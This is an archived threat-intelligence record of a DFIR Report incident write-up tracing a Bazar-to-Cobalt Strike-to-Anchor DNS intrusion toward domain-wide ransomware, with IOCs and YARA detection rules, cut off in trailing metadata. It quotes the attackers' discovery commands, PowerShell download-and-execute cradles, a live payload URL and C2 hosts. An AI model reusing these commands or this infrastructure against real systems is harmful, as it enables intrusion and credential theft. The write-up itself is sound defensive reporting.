{
	"id": "330d3778-1195-4cf2-b0cc-d6820b9de2c3",
	"created_at": "2026-04-06T00:21:34.074373Z",
	"updated_at": "2026-04-10T13:12:20.497368Z",
	"deleted_at": null,
	"sha1_hash": "2038a0eba536a55962c210b05d6ef146bd28ce28",
	"title": "Bazar Drops the Anchor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1548830,
	"plain_text": "Bazar Drops the Anchor\r\nBy editor\r\nPublished: 2021-03-08 · Archived: 2026-04-05 17:11:05 UTC\r\nIntro\r\nThe malware identified as Anchor first entered the scene in late 2018 and has been linked to the same group as Trickbot, due to similarities in code and usage of the two different malware families in the same intrusions. In 2020 the Bazar malware family entered and again many associated it with the same group behind Trickbot.\r\nIn an intrusion this past month we saw another link between the 3 families with a Bazar loader bringing in Anchor DNS to facilitate a full domain compromise intrusion. Over a 5 day time frame the threat actors moved from a single endpoint to full domain compromise, and while ransomware deployment was not seen in this intrusion the TTPs used mirror what we would expect from a big game ransomware crew.\r\nCase Summary\r\nIn this case we started with a DocuSign themed Excel maldoc. The Excel file failed to bring down the payload but to follow the infection chain we executed the follow-on loader. Once Bazar was established the malware quickly injected into the Werfault process to avoid detection. As seen in many intrusions the malware then performed some initial discovery with built-in Microsoft utilities such as Nltest.\r\nAbout an hour after initial execution, a Cobalt Strike beacon was loaded, followed shortly by Anchor. Shortly after Cobalt Strike and Anchor were running, the attackers dumped credentials and began moving laterally, starting with a domain controller.\r\nOnce on the domain controller, the threat actors ran additional discovery but then went quiet. Active command and control was maintained by all three malware samples (Bazar, Cobalt Strike, Anchor DNS) over the next 4 days.\r\nDuring that timeframe, honey documents were interacted with and additional discovery scans were executed. 
The threat actors were briefly active on day 3 to execute their Get-DataInfo script to collect additional information, which is usually followed closely by Ryuk ransomware.\r\nHowever, on the fifth day the threat actors' access was cut off before final objectives could be accomplished. We assess that the end goal of this intrusion was to execute domain wide ransomware.\r\nTimeline\r\nhttps://thedfirreport.com/2021/03/08/bazar-drops-the-anchor\r\nPage 1 of 19\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nA DocuSign themed Excel xls was opened and macros were enabled. Thanks to @ffforward for the document as well as the sandbox run leading up to the xls file.\r\nThe macro in this maldoc is using Excel 4 Macros.\r\nDocuSign was again the social engineering format of choice.\r\nAfter execution, Excel called out to:\r\nhttps://morrislibraryconsulting[.]com/favicam/gertnm.php\r\nExecution\r\nWe saw no further follow-on activity from the above execution, potentially due to the loader site being offline or some other condition not being met. We then executed the follow-on malware manually.\r\nBazar Loader – 14wfa5dfs.exe\r\nAbout an hour after execution of the above Bazar Loader, Cobalt Strike was executed by the injected Werfault process.\r\nShortly after Cobalt Strike was executed, it dropped several Anchor executable files.\r\nAnchorDns was then executed via Cobalt Strike which called cmd and then anchorAsjuster. 
Notice Asjuster passing two domains to anchor_x64.exe which will be used for C2.\r\nC:\\Windows\\system32\\cmd.exe /C C:\\Windows\\Temp\\adf\\anchorAsjuster_x64.exe --source=anchorDNS_x64.exe --target=\r\nDefense Evasion\r\nBazar quickly moved into a Werfault process to handle command and control communication, avoiding making any network connections directly.\r\nProcess injection was also seen in other key system executables such as winlogon.exe.\r\nCobalt Strike was seen locking access to SMB beacons.\r\nAnchor was also seen triggering process tampering.\r\nCredential Access\r\nThe threat actors were seen using remote thread creation to inject into lsass to extract credentials.\r\nThe same activity as seen via the larger process tree.\r\nDiscovery\r\nBazar initiated some discovery activity within 10 minutes of executing.\r\nnet view /all\r\nnet view /all /domain\r\nnltest.exe /domain_trusts /all_trusts\r\nnet localgroup \"administrator\"\r\nnet group \"domain admins\" /domain\r\nsysteminfo\r\nwhoami\r\nreg query hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nreg query hklm\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nreg query hkcu\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nreg query hkcu\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall /v \"DisplayName\" /s\r\nCobalt Strike initiated the following discovery commands:\r\nnet group \\\"enterprise admins\\\" /domain\r\nnet group \\\"domain admins\\\" /domain\r\nsysteminfo\r\nOn the domain controller the following discovery was run:\r\nnltest /dclist:\"DOMAIN.EXAMPLE\r\nnltest /domain_trusts /all_trusts\r\nIEX (New-Object Net.Webclient).DownloadString('\"http://127.0.0.1:3672/'); Get-NetSubnet\r\nIEX 
(New-Object Net.Webclient).DownloadString('http://127.0.0.1:45082/'); Get-NetComputer -ping\r\nThe following PowerShell command was executed from the domain controller.\r\nDecoded:\r\nIEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13773/'); Import-Module ActiveDirectory; Get-A\r\nSystems were pinged from the domain controller to confirm connectivity.\r\nC:\\Windows\\system32\\cmd.exe /C ping HOSTX\r\nFour days into the intrusion the threat actors dropped and executed Advanced_IP_Scanner_2.5.3850.exe which kicked off a scan of the network.\r\nAWS was used to get the public IP of the infected machine, multiple times.\r\ncheckip.amazonaws.com\r\nMinutes before deployment of Ryuk the threat actors usually drop the following files, usually on a domain controller. This time they dropped the files on a domain controller in C:\\info\r\nThe exact files were mentioned in our Bazar, No Ryuk report.\r\nstart.bat was executed with the following:\r\nC:\\Windows\\system32\\cmd.exe /c \"\"C:\\info\\start.bat\"\"\r\nThis script's contents show it to be a wrapper for the PowerShell script Get-DataInfo.ps1\r\nThe contents of Get-DataInfo.ps1 show a detailed information collector to provide the threat actor with very specific details of the environment. This includes things like disk size, connectivity, antivirus software, and backup software. 
The Ryuk group has used this script for at least a year as we’ve seen them use it multiple times.\r\nThis script and files are available @ https://thedfirreport.com/services/\r\nLateral Movement\r\nTwo hours post initial access the threat actors began lateral movement to one of the domain controllers using PowerShell, which was executed via a remote service, which launched Cobalt Strike.\r\nReviewing the PowerShell script we can extract the shellcode and run it through scdbg to find the pipe used by the beacon.\r\nThanks to 0xtornado and @mattnotmax for this recipe!\r\nThe threat actors also used SMB beacons executed by remote services. We saw this across most machines in the domain.\r\nThe threat actors also used RDP to log in to multiple machines within the domain.\r\nCollection\r\nWe did not witness collection events but we do believe files were collected and exfiltrated over encrypted C2 channels.\r\nCommand and Control\r\nBazar:\r\n34.210.71[.]206\r\nCertificate: [ec:c8:db:01:a4:a3:17:36:54:a2:f5:06:44:84:5c:f6:25:6e:4f:74 ]\r\nNot Before: 2021/02/04 02:59:01\r\nNot After: 2022/02/04 02:59:01\r\nIssuer Org: Global Security\r\nSubject Common: example.com\r\nSubject Org: Global Security\r\nPublic Algorithm: rsaEncryption\r\nJA3: 51c64c77e60f3980eea90869b68c58a8\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [06:32:21:0b:8b:a2:a7:3c:47:a4:33:53:11:a3:11:08:59:48:31:e2 ]\r\nNot Before: 2020/06/12 20:00:00\r\nNot After: 2021/05/22 08:00:00\r\nIssuer Org: Amazon\r\nSubject Common: *.v.m2.uw2.app.chime.aws [*.v.m2.uw2.app.chime.aws ]\r\nPublic Algorithm: rsaEncryption\r\nJA3: fc54e0d16d9764783542f0146a98b300\r\nJA3s: 9e4af711131ebfb2a0cff53c4f2d64e6\r\nWe observed the Bazar malware inject into a WerFault process to perform ongoing command and control communication.\r\nAnchor:\r\nThe AnchorDNS 
malware performed C2 over DNS to the following domains:\r\nxyskencevli.com\r\nsluaknhbsoe.com\r\nCobalt Strike:\r\n195.123.217[.]45\r\nJARM: 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1\r\nCertificate: [3c:bb:96:de:a7:d7:7a:7d:61:10:7c:53:e3:d0:f5:70:43:54:61:2e ]\r\nNot Before: 2021/02/08 03:45:51\r\nNot After: 2021/05/09 04:45:51\r\nIssuer Org: Let's Encrypt\r\nSubject Common: gloomix.com [gloomix.com ,www.gloomix.com ]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike Config:\r\n| grab_beacon_config:\r\n| x86 URI Response:\r\n| BeaconType: 0 (HTTP)\r\n| Port: 80\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: 195.123.217.45,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|\r\n|\r\n| x64 URI Response:\r\n| BeaconType: 0 (HTTP)\r\n| Port: 80\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: 195.123.217.45,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|_\r\n443/tcp open https\r\n| grab_beacon_config:\r\n| x86 URI Response:\r\n| BeaconType: 8 (HTTPS)\r\n| Port: 443\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 
Server: gloomix.com,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|\r\n|\r\n| x64 URI Response:\r\n| BeaconType: 8 (HTTPS)\r\n| Port: 443\r\n| Polling: 45000\r\n| Jitter: 37\r\n| Maxdns: 255\r\n| C2 Server: gloomix.com,/jquery-3.3.1.min.js\r\n| User Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n| HTTP Method Path 2: /jquery-3.3.2.min.js\r\n| Header1:\r\n| Header2:\r\n| PipeName:\r\n| DNS Idle: J}\\xC4q\r\n| DNS Sleep: 0\r\n| Method1: GET\r\n| Method2: POST\r\n| Spawnto_x86: %windir%\\syswow64\\dllhost.exe\r\n| Spawnto_x64: %windir%\\sysnative\\dllhost.exe\r\n| Proxy_AccessType: 2 (Use IE settings)\r\n|_\r\n~tmp01925d3f.exe can be seen communicating with the Cobalt Strike C2 channel.\r\nExfiltration\r\nNo exfiltration was observed but honey docs were taken off network and opened by the threat actors from remote locations. We assess that this exfiltration was performed over an encrypted C2 channel. This exfiltration has been going on for months and is rarely talked about when it comes to Wizard Spider.\r\nImpact\r\nWe believe this intrusion would have ended with domain wide ransomware. The deployment of the Get-DataInfo.ps1 script and overall TTPs used in the intrusion are consistent with threat actors associated with deployments of the Ryuk ransomware family.\r\nEnjoy our report? Please consider donating $1 or more using Patreon. 
Thank you for your support!\r\nWe also have pcaps, memory captures, scripts, executables, and Kape packages available here\r\nIOCs\r\nIf you would like access to our internal MISP and/or threat feeds please see here.\r\nNetwork\r\n54.176.158.165\r\n54.193.234.163\r\n54.241.149.90\r\n208.100.26.238\r\n63.251.235.71\r\n34.210.71.206\r\n195.123.217.45\r\ngloomix.com\r\nhttps://morrislibraryconsulting.com/favicam/gertnm.php\r\nxyskencevli.com\r\nsluaknhbsoe.com\r\nFile\r\nrequest_form_1612805504.xls\r\n58eaac6124749d0e93df6d05a4380c22\r\n7e14c560484cb7e8ae065224a7d4978b9939ef9a\r\nd9b13ef49c80375e0a8cf20b840b1e8283b35c1a1a6adcbb4173eb25490530e0\r\n~tmp01925d3f.exe\r\nef7047a0ca52ef7f4d20281b50207f71\r\n61d8f56452fd9df5952fac84f10ea8520ed5958c\r\n10ff83629d727df428af1f57c524e1eaddeefd608c5a317a5bfc13e2df87fb63\r\nanchorAsjuster_x64.exe\r\n9fbc3d560d075f33a15aa67ae74ac6ef\r\na298c6f5f8902fb581a1b5b922f95b362747f9a7\r\n3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d\r\nanchorDNS_x64.exe\r\n7160ac4abb26f0ca4c1b6dfba44f8d36\r\n3820ff0d04a233745c79932b77eccfe743a81d34\r\n9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513\r\nanchor_x64.exe\r\n0be407690fd049ea640dfc64a80c7b2a\r\nc9c4ef9b8b39c584d554de8afeb2be6f5648aa6d\r\nca72600f50c76029b6fb71f65423afc44e4e2d93257c3f95fb994adc602f3e1b\r\n14wfa5dfs.exe\r\n9a16a348d3f4e7da3e8746667624115f\r\nbebdec590d2a2fffaecb970b73e3067294c9125b\r\n2065157b834e1116abdd5d67167c77c6348361e04a8085aa382909500f1bbe69\r\nextracted-cobalt-strike-beacon.exe\r\n49dc44dfa14a76e139bf5efb4a78aca6\r\na47fc79bc1f0da5d292a986acdbe9057d3dd15c9\r\n738018c61a8db247615c9a3290c26fbbc4e230d5fbe00c4312401b90813c340c\r\nPDB paths\r\nanchordns_x64.exe - z:\\d\\git\\anchordns.llvm\\bin\\x64\\release\\anchordns_x64.pdb\r\nanchor_x64.exe - z:\\d\\git\\anchordns.llvm\\bin\\x64\\release\\anchordns_x64.pdb\r\n~tmp01925d3f.exe - 
c:\\users\\hillary\\source\\repos\\gromyko\\release\\gromyko.pdb\r\nAccessed Honey Docs\r\nIP: 23.94.51[.]80\r\nUA: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CL\r\nDetections\r\nNetwork\r\nET INFO Observed DNS Query for EmerDNS TLD (.bazar)\r\nETPRO POLICY External IP Check (checkip.amazonaws.com)\r\nETPRO TROJAN Win32/TrickBot Anchor Variant Style External IP Check\r\nET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection\r\nET SCAN Behavioral Unusual Port 139 traffic Potential Scan or Infection\r\nET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)\r\nETPRO POLICY Possibly Suspicious example.com SSL Cert\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nSigma\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml\r\nhttps://github.com/Neo23x0/sigma/blob/084cd39505861188d9d8f2d5c0f2835e4f750a3f/rules/windows/process_creation/win_malware_trickbot_r\r\nhttps://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_susp_commands_recon_activity.yml\r\nhttps://github.com/Neo23x0/sigma/blob/c56cd2dfff6343f3694ef4fd606a305415599737/rules/network/net_dns_c2_detection.yml\r\nYara\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2021-02-22\r\nIdentifier: 1017 Anchoring Bazar\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule bazar_14wfa5dfs {\r\nmeta:\r\ndescription = \"files - file 14wfa5dfs.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhash1 = \"2065157b834e1116abdd5d67167c77c6348361e04a8085aa382909500f1bbe69\"\r\nstrings:\r\n$s1 = 
\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n$s2 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n$s3 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s4 = \"0??dfg.dll ASHI128 bit 98tqewC58752F9578\" fullword ascii\r\n$s5 = \"*http://crl4.digicert.com/assured-cs-g1.crl0L\" fullword ascii\r\n$s6 = \"*http://crl3.digicert.com/assured-cs-g1.crl00\" fullword ascii\r\n$s7 = \"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L\" fullword ascii\r\n$s8 = \"appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}\u0026iid={F61A86A8-0045-3726-D207-E8A923987AD2}\u0026lang=ru\u0026brows\r\n$s9 = \"operator co_await\" fullword ascii\r\n$s10 = \"appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}\u0026iid={F61A86A8-0045-3726-D207-E8A923987AD2}\u0026lang=ru\u0026brow\r\n$s11 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s12 = \"Google LLC1\" fullword ascii\r\n$s13 = \"Google LLC0\" fullword ascii\r\n$s14 = \"Unknown issuer0\" fullword ascii\r\n$s15 = \"DigiCert, Inc.1$0\\\"\" fullword ascii\r\n$s16 = \"=Google%20Chrome\u0026needsadmin=prefers\u0026ap=x64-stable-statsdef_1\u0026installdataindex=empty\" fullword ascii\r\n$s17 = \"TIMESTAMP-SHA256-2019-10-150\" fullword ascii\r\n$s18 = \"vggwqrwqr7d6\" fullword ascii\r\n$s19 = \"api-ms-win-core-file-l1-2-2\" fullword wide /* Goodware String - occurred 1 times */\r\n$s20 = \"__swift_2\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 3000KB and\r\n( pe.imphash() == \"d8af53b239700b702d462c81a96d396c\" or 8 of them )\r\n}\r\nrule cobalt_strike_tmp01925d3f {\r\nmeta:\r\ndescription = \"files - file ~tmp01925d3f.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhash1 = 
\"10ff83629d727df428af1f57c524e1eaddeefd608c5a317a5bfc13e2df87fb63\"\nstrings:\n$x1 = \"C:\\\\Users\\\\hillary\\\\source\\\\repos\\\\gromyko\\\\Release\\\\gromyko.pdb\" fullword ascii\n$x2 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\n$s3 = \"gromyko32.dll\" fullword ascii\n$s4 = \"\" fullword ascii\n$s5 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\n$s6 = \"https://sectigo.com/CPS0\" fullword ascii\n$s7 = \"2http://crl.comodoca.com/AAACertificateServices.crl04\" fullword ascii\n$s8 = \"?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v\" fullword ascii\n$s9 = \"3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%\" fullword ascii\n$s10 = \"http://ocsp.sectigo.com0\" fullword ascii\n$s11 = \"2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s\" fullword ascii\n$s12 = \"2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#\" fullword ascii\n$s13 = \"http://www.digicert.com/CPS0\" fullword ascii\n$s14 = \"AppPolicyGetThreadInitializationType\" fullword ascii\n$s15 = \"alerajner@aol.com0\" fullword ascii\n$s16 = \"gromyko.inf\" fullword ascii\n$s17 = \"operator\u003c=\u003e\" fullword ascii\n$s18 = \"operator co_await\" fullword ascii\n$s19 = \"gromyko\" fullword ascii\n$s20 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\ncondition:\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\n( pe.imphash() == \"1b1b73382580c4be6fa24e8297e1849d\" or ( 1 of ($x*) or 4 of them ) )\n}\nrule advanced_ip_scanner {\nmeta:\ndescription = \"files - file advanced_ip_scanner.exe\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com/\"\ndate = \"2021-02-22\"\nhash1 = \"722fff8f38197d1449df500ae31a95bb34a6ddaba56834b13eaaff2b0f9f1c8b\"\nstrings:\n$x1 = \"www.radmin.com\" fullword wide\ncondition:\nuint16(0) == 0x5a4d and filesize \u003c 5000KB and\n( pe.imphash() == \"a3bc8eb6ac4320e91b7faf1e81af2bbf\" or ( 1 of ($x*) or 4 of them ) )\n}\nrule anchor_x64 
{\nmeta:\ndescription = \"files - file anchor_x64.exe\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com/\"\ndate = \"2021-02-22\"\nhash1 = \"ca72600f50c76029b6fb71f65423afc44e4e2d93257c3f95fb994adc602f3e1b\"\r\nstrings:\r\n$x1 = \"cmd.exe /c timeout 3 \u0026\u0026 \" fullword wide\r\n$x2 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003crequ\r\n$x3 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\r\n$s4 = \"\\\\System32\\\\cmd.ex\\\\System32\\\\rundllP\" fullword ascii\r\n$s5 = \"Z:\\\\D\\\\GIT\\\\anchorDns.llvm\\\\Bin\\\\x64\\\\Release\\\\anchorDNS_x64.pdb\" fullword ascii\r\n$s6 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s7 = \"cutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/requestedExecutionLevel\u003e\u003c/requestedPrivileges\u003e\u003c/se\r\n$s8 = \"thExecute\" fullword ascii\r\n$s9 = \"on xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsSettings\u003e\u003cdpiAware xmlns=\\\"http://schemas.microso\r\n$s10 = \"WinHTTP loader/1.0\" fullword wide\r\n$s11 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s12 = \"AnchorDNS.cpp\" fullword ascii\r\n$s13 = \"hardWorker.cpp\" fullword ascii\r\n$s14 = \"operator\u003c=\u003e\" fullword ascii\r\n$s15 = \"operator co_await\" fullword ascii\r\n$s16 = \"/C PowerShell \\\"Start-Slemove-Iteep 3; Re\" fullword wide\r\n$s17 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003creq\r\n$s18 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s19 = \"UAWAVAUATVWSH\" fullword ascii\r\n$s20 = \"AWAVAUATVWUSH\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 1000KB and\r\n( pe.imphash() 
== \"e2450fb3cc5b1b7305e3193fe03f3369\" or ( 1 of ($x*) or 4 of them ) )\r\n}\r\nrule anchorDNS_x64 {\r\nmeta:\r\ndescription = \"files - file anchorDNS_x64.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhash1 = \"9fdbd76141ec43b6867f091a2dca503edb2a85e4b98a4500611f5fe484109513\"\r\nstrings:\r\n$x1 = \"cmd.exe /c timeout 3 \u0026\u0026 \" fullword wide\r\n$x2 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003crequ\r\n$x3 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\r\n$s4 = \"\\\\System32\\\\cmd.ex\\\\System32\\\\rundllP\" fullword ascii\r\n$s5 = \"Z:\\\\D\\\\GIT\\\\anchorDns.llvm\\\\Bin\\\\x64\\\\Release\\\\anchorDNS_x64.pdb\" fullword ascii\r\n$s6 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n$s7 = \"cutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/requestedExecutionLevel\u003e\u003c/requestedPrivileges\u003e\u003c/se\r\n$s8 = \"thExecute\" fullword ascii\r\n$s9 = \"on xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsSettings\u003e\u003cdpiAware xmlns=\\\"http://schemas.microso\r\n$s10 = \"WinHTTP loader/1.0\" fullword wide\r\n$s11 = \"AppPolicyGetThreadInitializationType\" fullword ascii\r\n$s12 = \"AnchorDNS.cpp\" fullword ascii\r\n$s13 = \"hardWorker.cpp\" fullword ascii\r\n$s14 = \"operator\u003c=\u003e\" fullword ascii\r\n$s15 = \"operator co_await\" fullword ascii\r\n$s16 = \"/C PowerShell \\\"Start-Slemove-Iteep 3; Re\" fullword wide\r\n$s17 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo\u003e\u003csecurity\u003e\u003creq\r\n$s18 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n$s19 = \"UAWAVAUATVWSH\" fullword ascii\r\n$s20 = \"AWAVAUATVWUSH\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize 
\u003c 1000KB and\r\n( pe.imphash() == \"e2450fb3cc5b1b7305e3193fe03f3369\" or ( 1 of ($x*) or 4 of them ) )\r\n}\r\nrule anchorAsjuster_x64 {\r\nmeta:\r\ndescription = \"files - file anchorAsjuster_x64.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2021-02-22\"\r\nhash1 = \"3ab8a1ee10bd1b720e1c8a8795e78cdc09fec73a6bb91526c0ccd2dc2cfbc28d\"\r\nstrings:\r\n$s1 = \"curity\u003e\u003crequestedPrivileges\u003e\u003crequestedExecutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/requested\r\n$s2 = \"anchorAdjuster* --source=\u003csource file\u003e --target=\u003ctarget file\u003e --domain=\u003cdomain name\u003e --period=\u003crecurren\r\n$s3 = \"anchorAdjuster* --source=\u003csource file\u003e --target=\u003ctarget file\u003e --domain=\u003cdomain name\u003e --period=\u003crecurren\r\n$s4 = \"target file \\\"%s\\\"\" fullword ascii\r\n$s5 = \"--target=\" fullword ascii\r\n$s6 = \"hemas.microsoft.com/SMI/2005/WindowsSettings\\\"\u003etrue\u003c/dpiAware\u003e\u003c/windowsSettings\u003e\u003c/application\u003e\u003c/assembl\r\n$s7 = \"error write file, written %i bytes, need write %i bytes, error code %i\" fullword ascii\r\n$s8 = \"error create file \\\"%s\\\", code %i\" fullword ascii\r\n$s9 = \"guid: %s, shift 0x%08X(%i)\" fullword ascii\r\n$s10 = \"ault value 15\u003e -guid --count=\u003ccount of instances\u003e\" fullword ascii\r\n$s11 = \"domain: shift 0x%08X(%i)\" fullword ascii\r\n$s12 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo xmlns=\\\"urn:sc\r\n$s13 = \"vileges\u003e\u003c/security\u003e\u003c/trustInfo\u003e\u003capplication xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsSetting\r\n$s14 = \"wrong protocol type\" fullword ascii /* Goodware String - occurred 567 times */\r\n$s15 = \"network reset\" fullword ascii /* Goodware 
String - occurred 567 times */\r\n$s16 = \"owner dead\" fullword ascii /* Goodware String - occurred 567 times */\r\n$s17 = \"connection already in progress\" fullword ascii /* Goodware String - occurred 567 times */\r\n$s18 = \"network down\" fullword ascii /* Goodware String - occurred 567 times */\r\n$s19 = \"protocol not supported\" fullword ascii /* Goodware String - occurred 568 times */\r\n$s20 = \"connection aborted\" fullword ascii /* Goodware String - occurred 568 times */\r\ncondition:\r\nuint16(0) == 0x5a4d and filesize \u003c 700KB and\r\n( pe.imphash() == \"9859b7a32d1227be2ca925c81ae9265e\" or 8 of them )\r\n}\r\nMITRE\r\nSpearphishing Link - T1566.002\r\nCommand-Line Interface - T1059\r\nMalicious File - T1204.002\r\nScheduled Task - T1053.005\r\nUser Execution - T1204\r\nProcess Injection - T1055\r\nDNS - T1071.004\r\nCommonly Used Port - T1043\r\nApplication Layer Protocol - T1071\r\nExfiltration Over C2 Channel - T1041\r\nSMB/Windows Admin Shares - T1021.002\r\nDomain Trust Discovery - T1482\r\nDomain Account - T1087.002\r\nRemote System Discovery - T1018\r\nSystem Information Discovery - T1082\r\nOS Credential Dumping - T1003\r\nInternal case #1017\r\nSource: https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor"
	],
	"report_names": [
		"bazar-drops-the-anchor"
	],
	"threat_actors": [
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
